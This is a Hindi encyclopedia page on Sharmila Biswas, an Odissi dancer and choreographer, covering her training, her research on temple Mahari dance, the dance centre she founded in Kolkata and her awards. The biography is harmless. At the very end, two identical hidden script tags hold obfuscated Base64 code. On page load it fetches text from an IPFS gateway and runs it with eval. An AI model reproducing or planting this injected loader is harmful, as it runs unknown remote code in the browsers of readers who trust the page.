शर्मिला विश्वास

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
शर्मिला विश्वास

शर्मिला विश्वास (अंग्रेज़ी: Sharmila Biswas) प्रसिद्ध भारतीय शास्त्रीय नृत्यांगना व कोरियोग्राफर हैं। कई वर्षों में उन्होंने एलिफेंटा, खजुराहो नृत्य महोत्सव और कोणार्क नृत्य महोत्सव और यूके, यूएसए, जर्मनी, रूस, दुबई और बांग्लादेश में कला उत्सवों में भाग लिया है। वह शास्त्रीय ओड़िसी के साथ-साथ अपने प्रयोगात्मक नृत्य को भी करती हैं। उन्होंने उड़ीसा के मंदिर में नर्तकों द्वारा प्रस्तुत प्राचीन महरी नृत्य पर भी व्यापक शोध किया है।

परिचय

शर्मिला विश्वास का जन्म और पालन-पोषण कोलकाता में हुआ, जहाँ उन्होंने आठ साल की उम्र से नृत्य सीखना शुरू कर दिया था। जब वह सोलह साल की थी, तो उन्होंने मुरलीधरन माझी से ओड़िसी में प्रशिक्षण शुरू किया और फिर केलुचरण महापात्र के तहत प्रशिक्षण लिया। इसके बाद, उन्होंने कलानिधि नारायणन से अभिनय सीखा। 1987 में शर्मिला विश्वास ने स्वपन कुमार विश्वास से विवाह किया, जो स्वास्थ्य प्रबंधन में विशेषज्ञता रखने वाले डॉक्टर हैं। दोनों कोलकाता में रहते हैं। उनका एक बेटा शौमिक विश्वास है।

योगदान

शर्मिला विश्वास ने उड़ीसा के मंदिर में नर्तकों द्वारा प्रस्तुत प्राचीन महरी नृत्य पर भी व्यापक शोध किया है। 1995 में उन्होंने कोलकाता में ओड़िसी विजन एंड मूवमेंट सेंटर की स्थापना की, जहाँ वह कलात्मक निर्देशक हैं और युवा नर्तकों को प्रशिक्षण देती हैं। 2009 में उन्होंने पूर्व धारा शुरू किया, जो पूर्वी भारत और उत्तर पूर्व भारत के पारंपरिक नृत्यों का एक वार्षिक उत्सव है।

पुरस्कार व सम्मान

  • शर्मिला विश्वास को सूचना एवं प्रसारण मंत्रालय, भारत सरकार की ओर से "सर्वश्रेष्ठ कोरियोग्राफी अवार्ड" से सम्मानित किया गया। यह पुरस्कार उन्हें भारत में पुरी की देवदासियों पर आधारित सम्पूर्णा नामक नृत्य के निर्माण के लिए मिला।
  • सूचना और प्रसारण विभाग, पश्चिम बंगाल सरकार की ओर से 1998 में उदय शंकर सर्वश्रेष्ठ कोरियोग्राफी का पुरस्कार मिला।
  • 2010 में उन्हें को महारी पुरस्कार से सम्मानित किया गया था।
  • 2012 में संगीत नाटक अकादमी पुरस्कार से सम्मानित किया गया।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>